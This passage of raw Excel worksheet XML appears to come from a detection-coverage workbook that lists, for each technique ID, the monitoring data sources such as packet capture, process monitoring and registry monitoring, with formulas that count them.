      <c r="E124" s="13"/>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A125" s="24"/>
      <c r="B125" s="13"/>
      <c r="C125" s="13"/>
      <c r="D125" s="13"/>
      <c r="E125" s="13"/>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A126" s="24"/>
      <c r="B126" s="13"/>
      <c r="C126" s="13"/>
      <c r="D126" s="13"/>
      <c r="E126" s="13"/>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A127" s="24"/>
      <c r="B127" s="13"/>
      <c r="C127" s="13"/>
      <c r="D127" s="13"/>
      <c r="E127" s="13"/>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A128" s="24"/>
      <c r="B128" s="13"/>
      <c r="C128" s="13"/>
      <c r="D128" s="13"/>
      <c r="E128" s="13"/>
    </row>
    <row r="129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A129" s="24"/>
      <c r="B129" s="13"/>
      <c r="C129" s="13"/>
      <c r="D129" s="13"/>
      <c r="E129" s="13"/>
    </row>
    <row r="130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A130" s="24"/>
      <c r="B130" s="13"/>
      <c r="C130" s="13"/>
      <c r="D130" s="13"/>
      <c r="E130" s="13"/>
    </row>
    <row r="131" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A131" s="24"/>
      <c r="B131" s="13"/>
      <c r="C131" s="13"/>
      <c r="D131" s="13"/>
      <c r="E131" s="13"/>
    </row>
    <row r="132" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A132" s="24"/>
      <c r="B132" s="13"/>
      <c r="C132" s="13"/>
      <c r="D132" s="13"/>
      <c r="E132" s="13"/>
    </row>
    <row r="133" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A133" s="24"/>
      <c r="B133" s="13"/>
      <c r="C133" s="13"/>
      <c r="D133" s="13"/>
      <c r="E133" s="13"/>
    </row>
    <row r="134" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A134" s="24"/>
      <c r="B134" s="13"/>
      <c r="C134" s="13"/>
      <c r="D134" s="13"/>
      <c r="E134" s="13"/>
    </row>
    <row r="135" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A135" s="24"/>
      <c r="B135" s="13"/>
      <c r="C135" s="13"/>
      <c r="D135" s="13"/>
      <c r="E135" s="13"/>
    </row>
    <row r="136" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A136" s="24"/>
      <c r="B136" s="13"/>
      <c r="C136" s="13"/>
      <c r="D136" s="13"/>
      <c r="E136" s="13"/>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A137" s="24"/>
      <c r="B137" s="13"/>
      <c r="C137" s="13"/>
      <c r="D137" s="13"/>
      <c r="E137" s="13"/>
    </row>
    <row r="138" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A138" s="24"/>
      <c r="B138" s="13"/>
      <c r="C138" s="13"/>
      <c r="D138" s="13"/>
      <c r="E138" s="13"/>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A139" s="24"/>
      <c r="B139" s="13"/>
      <c r="C139" s="13"/>
      <c r="D139" s="13"/>
      <c r="E139" s="13"/>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A140" s="24"/>
      <c r="B140" s="13"/>
      <c r="C140" s="13"/>
      <c r="D140" s="13"/>
      <c r="E140" s="13"/>
    </row>
    <row r="141" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A141" s="24"/>
      <c r="B141" s="13"/>
      <c r="C141" s="13"/>
      <c r="D141" s="13"/>
      <c r="E141" s="13"/>
    </row>
    <row r="142" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A142" s="24"/>
      <c r="B142" s="13"/>
      <c r="C142" s="13"/>
      <c r="D142" s="13"/>
      <c r="E142" s="13"/>
    </row>
    <row r="143" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A143" s="24"/>
      <c r="B143" s="13"/>
      <c r="C143" s="13"/>
      <c r="D143" s="13"/>
      <c r="E143" s="13"/>
    </row>
    <row r="144" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A144" s="24"/>
      <c r="B144" s="13"/>
      <c r="C144" s="13"/>
      <c r="D144" s="13"/>
      <c r="E144" s="13"/>
    </row>
    <row r="145" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A145" s="24"/>
      <c r="B145" s="13"/>
      <c r="C145" s="13"/>
      <c r="D145" s="13"/>
      <c r="E145" s="13"/>
    </row>
    <row r="146" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A146" s="24"/>
      <c r="B146" s="13"/>
      <c r="C146" s="13"/>
      <c r="D146" s="13"/>
      <c r="E146" s="13"/>
    </row>
    <row r="147" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A147" s="24"/>
      <c r="B147" s="13"/>
      <c r="C147" s="13"/>
      <c r="D147" s="13"/>
      <c r="E147" s="13"/>
    </row>
    <row r="148" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A148" s="24"/>
      <c r="B148" s="13"/>
      <c r="C148" s="13"/>
      <c r="D148" s="13"/>
      <c r="E148" s="13"/>
    </row>
    <row r="149" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A149" s="24"/>
      <c r="B149" s="13"/>
      <c r="C149" s="13"/>
      <c r="D149" s="13"/>
      <c r="E149" s="13"/>
    </row>
    <row r="150" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A150" s="24"/>
      <c r="B150" s="13"/>
      <c r="C150" s="13"/>
      <c r="D150" s="13"/>
      <c r="E150" s="13"/>
    </row>
    <row r="151" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A151" s="24"/>
      <c r="B151" s="13"/>
      <c r="C151" s="13"/>
      <c r="D151" s="13"/>
      <c r="E151" s="13"/>
    </row>
    <row r="152" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A152" s="24"/>
      <c r="B152" s="13"/>
      <c r="C152" s="13"/>
      <c r="D152" s="13"/>
      <c r="E152" s="13"/>
    </row>
    <row r="153" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A153" s="24"/>
      <c r="B153" s="13"/>
      <c r="C153" s="13"/>
      <c r="D153" s="13"/>
      <c r="E153" s="13"/>
    </row>
    <row r="154" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A154" s="24"/>
      <c r="B154" s="13"/>
      <c r="C154" s="13"/>
      <c r="D154" s="13"/>
      <c r="E154" s="13"/>
    </row>
    <row r="155" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A155" s="24"/>
      <c r="B155" s="13"/>
      <c r="C155" s="13"/>
      <c r="D155" s="13"/>
      <c r="E155" s="13"/>
    </row>
    <row r="156" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A156" s="24"/>
      <c r="B156" s="13"/>
      <c r="C156" s="13"/>
      <c r="D156" s="13"/>
      <c r="E156" s="13"/>
    </row>
    <row r="157" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A157" s="24"/>
      <c r="B157" s="13"/>
      <c r="C157" s="13"/>
      <c r="D157" s="13"/>
      <c r="E157" s="13"/>
    </row>
    <row r="158" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A158" s="24"/>
      <c r="B158" s="13"/>
      <c r="C158" s="13"/>
      <c r="D158" s="13"/>
      <c r="E158" s="13"/>
    </row>
    <row r="159" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A159" s="24"/>
      <c r="B159" s="13"/>
      <c r="C159" s="13"/>
      <c r="D159" s="13"/>
      <c r="E159" s="13"/>
    </row>
    <row r="160" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A160" s="24"/>
      <c r="B160" s="13"/>
      <c r="C160" s="13"/>
      <c r="D160" s="13"/>
      <c r="E160" s="13"/>
    </row>
    <row r="161" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A161" s="24"/>
      <c r="B161" s="13"/>
      <c r="C161" s="13"/>
      <c r="D161" s="13"/>
      <c r="E161" s="13"/>
    </row>
    <row r="162" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A162" s="24"/>
      <c r="B162" s="13"/>
      <c r="C162" s="13"/>
      <c r="D162" s="13"/>
      <c r="E162" s="13"/>
    </row>
    <row r="163" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A163" s="24"/>
      <c r="B163" s="13"/>
      <c r="C163" s="13"/>
      <c r="D163" s="13"/>
      <c r="E163" s="13"/>
    </row>
    <row r="164" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A164" s="24"/>
      <c r="B164" s="13"/>
      <c r="C164" s="13"/>
      <c r="D164" s="13"/>
      <c r="E164" s="13"/>
    </row>
    <row r="165" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A165" s="24"/>
      <c r="B165" s="13"/>
      <c r="C165" s="13"/>
      <c r="D165" s="13"/>
      <c r="E165" s="13"/>
    </row>
    <row r="166" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A166" s="24"/>
      <c r="B166" s="13"/>
      <c r="C166" s="13"/>
      <c r="D166" s="13"/>
      <c r="E166" s="13"/>
    </row>
    <row r="167" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A167" s="24"/>
      <c r="B167" s="13"/>
      <c r="C167" s="13"/>
      <c r="D167" s="13"/>
      <c r="E167" s="13"/>
    </row>
    <row r="168" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A168" s="24"/>
      <c r="B168" s="13"/>
      <c r="C168" s="13"/>
      <c r="D168" s="13"/>
      <c r="E168" s="13"/>
    </row>
    <row r="169" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A169" s="24"/>
      <c r="B169" s="13"/>
      <c r="C169" s="13"/>
      <c r="D169" s="13"/>
      <c r="E169" s="13"/>
    </row>
    <row r="170" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A170" s="24"/>
      <c r="B170" s="13"/>
      <c r="C170" s="13"/>
      <c r="D170" s="13"/>
      <c r="E170" s="13"/>
    </row>
    <row r="171" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A171" s="24"/>
      <c r="B171" s="13"/>
      <c r="C171" s="13"/>
      <c r="D171" s="13"/>
      <c r="E171" s="13"/>
    </row>
    <row r="172" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A172" s="24"/>
      <c r="B172" s="13"/>
      <c r="C172" s="13"/>
      <c r="D172" s="13"/>
      <c r="E172" s="13"/>
    </row>
    <row r="173" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A173" s="24"/>
      <c r="B173" s="13"/>
      <c r="C173" s="13"/>
      <c r="D173" s="13"/>
      <c r="E173" s="13"/>
    </row>
    <row r="174" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A174" s="24"/>
      <c r="B174" s="13"/>
      <c r="C174" s="13"/>
      <c r="D174" s="13"/>
      <c r="E174" s="13"/>
    </row>
    <row r="175" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A175" s="24"/>
      <c r="B175" s="13"/>
      <c r="C175" s="13"/>
      <c r="D175" s="13"/>
      <c r="E175" s="13"/>
    </row>
    <row r="176" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A176" s="24"/>
      <c r="B176" s="13"/>
      <c r="C176" s="13"/>
      <c r="D176" s="13"/>
      <c r="E176" s="13"/>
    </row>
    <row r="177" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A177" s="24"/>
      <c r="B177" s="13"/>
      <c r="C177" s="13"/>
      <c r="D177" s="13"/>
      <c r="E177" s="13"/>
    </row>
    <row r="178" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A178" s="24"/>
      <c r="B178" s="13"/>
      <c r="C178" s="13"/>
      <c r="D178" s="13"/>
      <c r="E178" s="13"/>
    </row>
    <row r="179" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A179" s="24"/>
      <c r="B179" s="13"/>
      <c r="C179" s="13"/>
      <c r="D179" s="13"/>
      <c r="E179" s="13"/>
    </row>
    <row r="180" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A180" s="24"/>
      <c r="B180" s="13"/>
      <c r="C180" s="13"/>
      <c r="D180" s="13"/>
      <c r="E180" s="13"/>
    </row>
    <row r="181" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A181" s="24"/>
      <c r="B181" s="13"/>
      <c r="C181" s="13"/>
      <c r="D181" s="13"/>
      <c r="E181" s="13"/>
    </row>
    <row r="182" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A182" s="24"/>
      <c r="B182" s="13"/>
      <c r="C182" s="13"/>
      <c r="D182" s="13"/>
      <c r="E182" s="13"/>
    </row>
    <row r="183" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A183" s="24"/>
      <c r="B183" s="13"/>
      <c r="C183" s="13"/>
      <c r="D183" s="13"/>
      <c r="E183" s="13"/>
    </row>
    <row r="184" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A184" s="24"/>
      <c r="B184" s="13"/>
      <c r="C184" s="13"/>
      <c r="D184" s="13"/>
      <c r="E184" s="13"/>
    </row>
    <row r="185" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A185" s="24"/>
      <c r="B185" s="13"/>
      <c r="C185" s="13"/>
      <c r="D185" s="13"/>
      <c r="E185" s="13"/>
    </row>
    <row r="186" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A186" s="24"/>
      <c r="B186" s="13"/>
      <c r="C186" s="13"/>
      <c r="D186" s="13"/>
      <c r="E186" s="13"/>
    </row>
    <row r="187" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A187" s="24"/>
      <c r="B187" s="13"/>
      <c r="C187" s="13"/>
      <c r="D187" s="13"/>
      <c r="E187" s="13"/>
    </row>
    <row r="188" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A188" s="24"/>
      <c r="B188" s="13"/>
      <c r="C188" s="13"/>
      <c r="D188" s="13"/>
      <c r="E188" s="13"/>
    </row>
    <row r="189" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A189" s="24"/>
      <c r="B189" s="13"/>
      <c r="C189" s="13"/>
      <c r="D189" s="13"/>
      <c r="E189" s="13"/>
    </row>
    <row r="190" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A190" s="24"/>
      <c r="B190" s="13"/>
      <c r="C190" s="13"/>
      <c r="D190" s="13"/>
      <c r="E190" s="13"/>
    </row>
    <row r="191" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A191" s="24"/>
      <c r="B191" s="13"/>
      <c r="C191" s="13"/>
      <c r="D191" s="13"/>
      <c r="E191" s="13"/>
    </row>
    <row r="192" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A192" s="24"/>
      <c r="B192" s="13"/>
      <c r="C192" s="13"/>
      <c r="D192" s="13"/>
      <c r="E192" s="13"/>
    </row>
    <row r="193" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A193" s="24"/>
      <c r="B193" s="13"/>
      <c r="C193" s="13"/>
      <c r="D193" s="13"/>
      <c r="E193" s="13"/>
    </row>
    <row r="194" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A194" s="24"/>
      <c r="B194" s="13"/>
      <c r="C194" s="13"/>
      <c r="D194" s="13"/>
      <c r="E194" s="13"/>
    </row>
    <row r="195" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A195" s="24"/>
      <c r="B195" s="13"/>
      <c r="C195" s="13"/>
      <c r="D195" s="13"/>
      <c r="E195" s="13"/>
    </row>
    <row r="196" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A196" s="24"/>
      <c r="B196" s="13"/>
      <c r="C196" s="13"/>
      <c r="D196" s="13"/>
      <c r="E196" s="13"/>
    </row>
    <row r="197" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A197" s="24"/>
      <c r="B197" s="13"/>
      <c r="C197" s="13"/>
      <c r="D197" s="13"/>
      <c r="E197" s="1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67"/>
  <sheetViews>
    <sheetView topLeftCell="A208" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="B227" sqref="B227"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="16.140625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.85546875" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.7109375" style="4" customWidth="1"/>
    <col min="5" max="6" width="11.140625" style="4" customWidth="1"/>
    <col min="7" max="7" width="47.7109375" style="12" customWidth="1"/>
    <col min="8" max="22" width="9.140625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="28" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="28" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="28" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A2" s="16" t="s">
        <v>7</v>
      </c>
      <c r="B2" s="13" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D2" s="13">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="13">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="18"/>
      <c r="G2" s="13">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A3" s="16" t="s">
        <v>9</v>
      </c>
      <c r="B3" s="13" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>10</v>
      </c>
      <c r="D3" s="13">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="18"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A4" s="16" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="13" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="18"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A5" s="16" t="s">
        <v>12</v>
      </c>
      <c r="B5" s="13" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E5" s="13">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F5" s="18"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6" s="16" t="s">
        <v>14</v>
      </c>
      <c r="B6" s="13" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D6" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E6" s="13">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="18"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A7" s="16" t="s">
        <v>16</v>
      </c>
      <c r="B7" s="13" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C7" s="17">
        <v>100</v>
      </c>
      <c r="D7" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E7" s="13">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F7" s="13"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A8" s="16" t="s">
        <v>17</v>
      </c>
      <c r="B8" s="13" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D8" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E8" s="13">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F8" s="13"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A9" s="16" t="s">
        <v>19</v>
      </c>
      <c r="B9" s="13" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>20</v>
      </c>
      <c r="D9" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E9" s="13">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="F9" s="13"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A10" s="16" t="s">
        <v>21</v>
      </c>
      <c r="B10" s="13" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Malware reverse engineering</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>22</v>
      </c>
      <c r="D10" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E10" s="13">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="13"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A11" s="16" t="s">
        <v>23</v>
      </c>
      <c r="B11" s="13" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>24</v>
      </c>
      <c r="D11" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="13"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A12" s="16" t="s">
        <v>25</v>
      </c>
      <c r="B12" s="13" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D12" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E12" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F12" s="13"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A13" s="16" t="s">
        <v>27</v>
      </c>
      <c r="B13" s="13" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>28</v>
      </c>
      <c r="D13" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E13" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F13" s="13"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A14" s="16" t="s">
        <v>29</v>
      </c>
      <c r="B14" s="13" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D14" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E14" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F14" s="13"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A15" s="16" t="s">
        <v>31</v>
      </c>
      <c r="B15" s="13" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>32</v>
      </c>
      <c r="D15" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="13"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A16" s="16" t="s">
        <v>33</v>
      </c>
      <c r="B16" s="13" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C16" s="17" t="s">
        <v>34</v>
      </c>
      <c r="D16" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E16" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F16" s="13"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A17" s="16" t="s">
        <v>35</v>
      </c>
      <c r="B17" s="13" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D17" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="13"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A18" s="16" t="s">
        <v>36</v>
      </c>
      <c r="B18" s="13" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process use of network,Process monitoring</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D18" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E18" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F18" s="13"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A19" s="16" t="s">
        <v>38</v>
      </c>
      <c r="B19" s="13" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>39</v>
      </c>
      <c r="D19" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E19" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F19" s="13"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A20" s="16" t="s">
        <v>40</v>
      </c>
      <c r="B20" s="13" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>API monitoring,BIOS,EFI</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>41</v>
      </c>
      <c r="D20" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E20" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F20" s="13"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A21" s="16" t="s">
        <v>42</v>
      </c>
      <c r="B21" s="13" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D21" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E21" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F21" s="13"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A22" s="16" t="s">
        <v>43</v>
      </c>
      <c r="B22" s="13" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C22" s="17">
        <v>100</v>
      </c>
